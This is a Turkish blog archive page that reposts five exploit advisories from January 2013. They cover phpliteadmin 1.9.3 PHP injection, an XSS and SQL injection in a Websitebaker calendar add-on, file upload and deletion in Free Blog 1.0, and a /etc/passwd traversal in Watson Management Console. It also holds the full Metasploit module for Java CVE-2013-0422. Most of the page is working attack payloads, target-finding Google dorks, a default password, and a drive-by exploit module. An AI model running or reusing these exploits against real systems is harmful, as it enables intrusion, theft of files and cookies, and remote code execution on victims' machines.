Archive for 14 Ocak 2013

phpliteadmin 1.9.3 Remote PHP Code Injection Vulnerability

phpliteadmin 1.9.3 Remote PHP Uzaktan Kod Çalıştırma açığı bulunmuş olup, açık bulucunun, açığın bulunduğu yerler ve açığın kullanımı hakkındaki açıklamaları şu şekilde;


# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability # Google Dork: inurl:phpliteadmin.php (Default PW: admin) # Date: 01/10/2013 # Exploit Author: <a href="mailto:L@usch">L@usch</a> - <a href="http://la.usch.io">http://la.usch.io</a> - <a href="http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt">http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt</a> # Vendor Homepage: <a href="http://code.google.com/p/phpliteadmin/">http://code.google.com/p/phpliteadmin/</a> # Vendor Status: Informed # Software Link: <a href="http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip">http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip</a> # Version: 1.9.3 # Tested on: Windows and Linux

Description:

phpliteadmin.php#1784: 'Creating a New Database' => phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php". (Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".) The script will store the sqlite database in the same directory as phpliteadmin.php. Preview: <a href="http://goo.gl/B5n9O">http://goo.gl/B5n9O</a> Hex preview: <a href="http://goo.gl/lJ5iQ">http://goo.gl/lJ5iQ</a>

2. Now create a new table in this database and insert a text field with the default value: <?php phpinfo()?> Hex preview: <a href="http://goo.gl/v7USQ">http://goo.gl/v7USQ</a>

3. Now we run hack.php

Done!

Proof: <a href="http://goo.gl/ZqPVL">http://goo.gl/ZqPVL</a>

Websitebaker Add-on Concert Calendar 2.1.4 Multiple Vulnerabilities

Websitebaker Add-on Concert Calendar 2.1.4 Versiyonunda genel açık bulundu. Açıkla ilgili olarak açık bulucunun açığın oluşum yerleri ve kullanımı hakkındaki yorumları aşağıdaki şekilde.


Advisory:  Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability Advisory ID:  SSCHADV2013-001 Author:   Stefan Schurtz Affected Software: Successfully tested on Concert Calendar 2.1.4 Vendor URL:  <a href="http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37">http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37</a> Vendor Status:  informed

========================== Vulnerability Description ==========================

Websitebaker Add-on 'Concert Calendar 2.1.4' is prone to a XSS and SQLi vulnerability

========================== Vuln code ==========================

// view.php

if (isset($_GET['date'])) {         $date = $_GET['date']; } . . . // SQLi $query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'"); // Zeile 184

// XSS

echo " ".switch_date($date, $dateview)." "; // Zeile 176

========================== PoC-Exploit ==========================

// SQLi (magic_quotes = off)

<a href="http://[target]/wb/pages/addon.php?date=[SQLi">http://[target]/wb/pages/addon.php?date=[SQLi</a>]

// XSS

<a href="http://[target]/wb/pages/addon.php?date='&quot;><script>alert(document.cookie)</script">http://[target]/wb/pages/addon.php?date='"><script>alert(document.cookie)</script</a>>

========================== Solution ==========================

-

========================== Disclosure Timeline ==========================

01-Jan-2013 - developer informed

========================== Credits ==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

========================== References ==========================

<a href="http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37">http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37</a> <a href="http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt">http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt</a>

Free Blog 1.0 Multiple Vulnerabilities

Free Blog 1.0 Versiyonunda genel açık bulundu. Açıkla ilgili açık bulucunun bilgileri aşağıdaki gibidir;


# Free Blog 1.0 Multiple Vulnerability # By cr4wl3r <a href="http://bastardlabs.info">http://bastardlabs.info</a> # <a href="http://bastardlabs.info/exploits/Free_Blog.txt">http://bastardlabs.info/exploits/Free_Blog.txt</a> # Software Link: <a href="http://blog.sdnex.com/">http://blog.sdnex.com/</a> # Tested: Ubuntu 12.04.1 LTS

Proof of concept:

Arbitrary File Upload Vulnerability

<a href="http://bastardlabs/blog_path/up.php">http://bastardlabs/blog_path/up.php</a>

Shell will be available here

<a href="http://bastardlabs/blog_path/log/images/shell.php">http://bastardlabs/blog_path/log/images/shell.php</a>

&nbsp;

Arbitrary File Deletion Vulnerability

---------- 49 <?php 50 if($_GET['del']){ 51 $id=$_GET['del']; 52 unlink("./log/images/$id"); 53 } 54 ?> ----------

<a href="http://bastardlabs/blog_path/up.php?del=../../[file">http://bastardlabs/blog_path/up.php?del=../../[file</a>]    <a href="http://bastardlabs/blog_path/up.php?del=../../config.php">http://bastardlabs/blog_path/up.php?del=../../config.php</a>

------------------------------ My sweetheart <a href="http://www.photoshow.com/watch/rx9IX5ZS">http://www.photoshow.com/watch/rx9IX5ZS</a>

Watson Management Console 4.11.2.G Directory Traversal Vulnerability

Watson Management Console 4.11.2. G Directory Traversal Açık bulundu Açığa ilişkin açık bulucunun açıklamaları aşağıdaki gibidir. Açıkla Uzaktan /etc/paswd dizini okunabilmekte.


# Exploit Title: Watson Management Console Directory Traversal Vulnerability # Google Dork: allintitle:Watson Management Console # Contacted Vendor : 17/12/2012 as well as 31/12/2012 The Vendor Did Not Respond . # Date: 1/2/2013 # Exploit Author: Dhruv Shah # Vendor Homepage: <a href="http://www.schmid-telecom.com/">http://www.schmid-telecom.com/</a> # Software Link: N/A # Version: 441A800W0G (4.11.2.G) # Platform:Hardware

Watson Management Console is a ( Watson SHDSL Router 2p 8xEthernet Tabletop )

It has been found that Watson Management Console is prone to a directory traversal vulnerability. The issue is due to the server's failure to properly validate user supplied http requests.

This issue may allow an attacker to escape the web server root directory and view any web server readable files. Information acquired by exploiting this issue may be used to aid further attacks against a vulnerable system.

<a href="http://www.example.com">http://www.example.com</a>

in burpsuite proxy or any proxy http request proxy that u use edit the Request paramater to

GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd HTTP/1.1

-- Regards Snypter a.k.a Dhruv Shah <a href="http://blog.snypter.com">http://blog.snypter.com</a> <a href="http://www.youtube.com/snypter">http://www.youtube.com/snypter</a> <a href="http://www.facebook.com/dhruvshahs">http://www.facebook.com/dhruvshahs</a>

Java Applet JMX Remote Code Execution

Java Applet JMX uzaktan kod çalışmırma açığı bulundu. Açık metesploit tarafından bulunmuş olup, açığı ilişkin exploit aşağıdadır.


## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. #   <a href="http://metasploit.com/">http://metasploit.com/</a> ##

require 'msf/core' require 'rex'

class Metasploit3 < Msf::Exploit::Remote  Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::EXE

include Msf::Exploit::Remote::BrowserAutopwn  autopwn_info({ :javascript => false })

def initialize( info = {} )

super( update_info( info,    'Name'          => 'Java Applet JMX Remote Code Execution',    'Description'   => %q{      This module abuses the JMX classes from a Java Applet to run arbitrary Java     code outside of the sandbox as exploited in the wild in January of 2013. The     vulnerability affects Java version 7u10 and earlier.    },    'License'       => MSF_LICENSE,    'Author'        =>     [      'Unknown', # Vulnerability discovery      'egypt', # Metasploit module      'sinn3r', # Metasploit module      'juan vazquez' # Metasploit module     ],    'References'    =>     [      [ 'CVE', '2013-0422' ],      [ 'US-CERT-VU', '625617' ],      [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],      [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],      [ 'URL', 'http://pastebin.com/cUG2ayjh' ]  #Who authored the code on pastebin?  I can't read Russian 🙁     ],    'Platform'      => [ 'java', 'win', 'osx', 'linux' ],    'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },    'Targets'       =>     [      [ 'Generic (Java Payload)',       {        'Platform' => ['java'],        'Arch' => ARCH_JAVA,       }      ],      [ 'Windows x86 (Native Payload)',       {        'Platform' => 'win',        'Arch' => ARCH_X86,       }      ],      [ 'Mac OS X x86 (Native Payload)',       {        'Platform' => 'osx',        'Arch' => ARCH_X86,       }      ],      [ 'Linux x86 (Native Payload)',       {        'Platform' => 'linux',        'Arch' => ARCH_X86,       }      ],     ],    'DefaultTarget'  => 0,    'DisclosureDate' => 'Jan 10 2013'   ))  end

def setup   path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")   @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }   path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")   @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

@exploit_class_name = rand_text_alpha("Exploit".length)   @exploit_class.gsub!("Exploit", @exploit_class_name)   super  end

def on_request_uri(cli, request)   print_status("handling request for #{request.uri}")

case request.uri   when /\.jar$/i    jar = payload.encoded_jar    jar.add_file("<a href="mailto:#{@exploit_class_name}.class">#{@exploit_class_name}.class</a>", @exploit_class)    jar.add_file("B.class", @loader_class)    metasploit_str = rand_text_alpha("metasploit".length)    payload_str = rand_text_alpha("payload".length)    jar.entries.each { |entry|     entry.name.gsub!("metasploit", metasploit_str)     entry.name.gsub!("Payload", payload_str)     entry.data = entry.data.gsub("metasploit", metasploit_str)     entry.data = entry.data.gsub("Payload", payload_str)    }    jar.build_manifest

send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })   when /\/$/    payload = regenerate_payload(cli)    if not payload     print_error("Failed to generate the payload.")     send_not_found(cli)     return    end    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })   else    send_redirect(cli, get_resource() + '/', '')   end

end

def generate_html   html  = %Q|<html><head><title>Download</title></head>|   html += %Q|<body><center><p>Loading, Please Wait...</p></center>|   html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="<a href="mailto:#{@exploit_class_name}.class">#{@exploit_class_name}.class</a>" width="1" height="1">|   html += %Q|</applet></body></html>|   return html  end

end